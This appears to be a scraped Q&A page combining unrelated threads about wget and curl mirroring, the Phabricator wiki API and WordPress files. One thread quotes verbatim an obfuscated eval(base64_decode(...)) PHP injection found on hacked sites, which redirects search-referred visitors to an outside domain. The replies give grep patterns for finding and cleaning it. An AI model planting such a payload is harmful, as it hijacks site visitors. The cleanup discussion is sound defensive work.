I am testing one of my server implementations and was wondering if I could make curl get embedded content? I mean, when a browser loads a page, it downloads all associated content too... Can someone please tell me how to do this with curl?
I don't mind if it dumps even the binary data onto the terminal... I am trying to benchmark my server (keeping it simple initially to test for bugs... probably after this, I will use one of those dedicated tools like ab)...
wget --page-requisites
This option causes Wget to download
all the files that are necessary to
properly display a given HTML page.
if you want to download recursively, use wget with -r option, instead of curl. also check out the wget man page to get certain types of files.
Related
The company I work for uses the "Phriction" wiki in Phabricator for a considerable amount of documentation. I'd like to be able do the following, programmatically, in order of importance:
Download (e.g., with curl or wget) the ReStructuredTExt (RST) to a local file where I can edit it, diff it, etc. Ideally I should be able to download either the latest version or any specific version.
Locally render (e.g., in a local graphical web browser) the markup as Phabricator would render it. If relative links can link correctly back to the original wiki, that's a bonus.
Upload new versions of the wiki page.
If you have don't know how to do exactly any of this, but have information or tool suggestions that would help me get started on writing software to do the above, please mention them. (If you're worried about too many answers that don't actually answer any of the questions above, try adding or editing a single community answer for this sort of information.)
I would do the following in your situation:
Downloading the single phriction pages using the API (Conduit) methods in the phriction section.
Therefore you need a Conduit Api Token. You can create in your profile settings of your phabricators intstance.
Then take a look at the phriction.info mehtod: This methods needs the page slug as parameter. In this example I use the /changelog/ page.
You can choose between arcanist, cURl or PHP to use the RestApi. Additionally you can use any other way to preform RestApi commands in the cURL syntax.
If you need some more examples how to run the conduit method you can toggle between some variations at the bottom of the output page.
Transform the page content as you like.
Upload the page again with the conduit methods (phriction.edit).
The way you downloaded the content you can edit the documents, too. But here you need some more parameter:
I personally, try first all conduit methods via the web interface first and then transform it to an a script.
Before I start the question off, I want to say that a similar question helped me get past the initial login. My issue is as stated below.
There's a website that I'm trying to mirror. It is something that I have an account for. I'm using wget as my tool of choice. I tried curl, but found that while submitting post data is easy with it, wget is better equipped for the task at hand.
The website has an initial login page that it redirects to. After this, you have access to everything on the website. Logins do timeout after so long, but that's it.
With the wget commands below, I was able to successfully save my cookies, load them, and download all child folders. My issue, however, is that each child has an index.html of the same login page. It's like the cookie worked fine for the root folder but nothing beneath it.
The commands I used were:
wget http://site.here.com/users/login --save-cookies cookies.txt --post-data 'email=example#test.com&password=*****&remember_me=1' --keep-session-cookies --delete-after
wget http://site.here.com/ --load-cookies cookies.txt --keep-session-cookies -r -np
Note that the post-data variables/ids are different and that I had to download the login page to see what they were.
Secondly, note that if I didn't put remember_me value to 1 that cookies.txt would be different.
Without remember_me=1
.here.com TRUE / FALSE numbershere CAKEPHP garbagehere
With remember_me=1
site.here.com FALSE / FALSE numbershere CakeCookie[rememberme] garbage
.here.com TRUE / FALSE numbershere CAKEPHP garbagehere
The result being that the former would only download the login page and the latter getting to all child folders, only with children containing index of login and that's it.
I'm kind of stuck and my experience with wget and http is very limited. What would you do to get past this? Generate a cookie for each child? How would you automate that instead of manually creating a cookie file for each child?
P.S: I'm using Linux if that reflects the answers I'm given.
Figured it out. Kind of.
When I wget with options above, I get all children. If I then wget each child(again with options above) and make sure to specify folder by ending with "/", then it works.
Not sure why the behavior is like this, but it is. When I do this, it has no problem grabbing the children's, children or anything as such.
I've been having issues on my server with the following PHP inserted in all of my Drupal and Wordpress sites.
I have downloaded a full backup of my sites and will clean them all before changing my ftp details and reuploading them again. Hopefully this should clear things up.
My question is:
Using Notepad++ is there a *.* style search criteria I could use to scan my backup files and delete the lines of malicious code without having to do them all individually on my local machine?
This would clearly save me loads of time. Up to now, I've been replacing the following code with blank but the eval code varies on each of my sites.
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
I would change your FTP details immediately. You don't want them hosting warez or something if they have been able to work out the password.
Then shutdown your site so that your visitors are not subjected to any scripts or hijacks.
As far as searching goes a regex like this should sort it out:
eval\(base64_decode\("[\d\w]+"\)\);
I've also had the same problem with my WordPress blogs, eval base64_decode hack. The php files were being injected with those eval lines. I suggest you reinstall wordpress/drupal, as some other scripts may already be present in your site, then change all passwords.
Try running grep through ssh, eg. grep -r -H "eval base64_decode". It'll show you which files are infected. Then if you have time, automate the process so you will be notified in case it happens again.
And in the future, always update WordPress/Drupal.
It's easier if you can use special tools to remove this malicious code, because it could be tricky to find the actual regex to match all the code and you never know if that worked, or you broken your site. Especially when you've multiple files, you should identify the suspicious files by the following commands:
grep -R eval.*base64_decode .
grep -R return.*base64_decode .
but it could be not enough, so you should consider using these PHP security scanners.
For more details, check: How to get rid of eval-base64_decode like PHP virus files?.
For Drupal, check also: How to remove malicious scripts from admin pages after being hacked?
I updated my checkout page by updating mostly the file which was in ....wp-ecommerce/wpsc-theme/wpsc-shopping_cart_page.php
It worked fine for a while, but now some of the changed states reverted to the previous state. Actually, I can even delete the file that I mentioned above, so it means wordpress is loading this file from somewhere else. Any ideas from where and what had happened? Thanks for your help.
Although I don't have a specific answer to your question, if you use an IDE (like Dreamweaver or Eclipse) you could grab a copy of your sites code to your local PC and do a code search for something that is unique to that page.
Ie, if there is a <div class="a_unique_div"> tag somewhere on that page and you know it's only visible on that page, search the code for that and it may give you a clue what file is being used for the output. Even if it's only used on 1 or 2 pages it may bring you closer to working it out.
Alternatively, if you have SSH access you could try and "grep" for the code by SSHing into your server and running a command like:
grep -i -R '<div class="a_unique_div">' /www/your_wp_folder/
(where /www/your_wp_folder/ is the path to your WordPress installation)
Though for this you'll need SSH access, grep installed on the server, etc, so it may not be a viable option.
Good luck!
Looking for a Linux application (or Firefox extension) that will allow me to scrape an HTML mockup and keep the page's integrity.
Firefox does an almost perfect job but doesn't grab images referenced in the CSS.
The Scrapbook extension for Firefox gets everything, but flattens the directory structure.
I wouldn't terribly mind if all folders became children of the index page.
See Website Mirroring With wget
wget --mirror –w 2 –p --HTML-extension –-convert-links http://www.yourdomain.com
Have you tried wget?
wget -r does what you want, and if not, there are plenty of flags to configure it. See man wget.
Another option is curl, which is even more powerful. See http://curl.haxx.se/.
Teleport Pro is great for this sort of thing. You can point it at complete websites and it will download a copy locally maintaining directory structure, and replacing absolute links with relative ones as necessary. You can also specify whether you want content from other third-party websites linked to from the original site.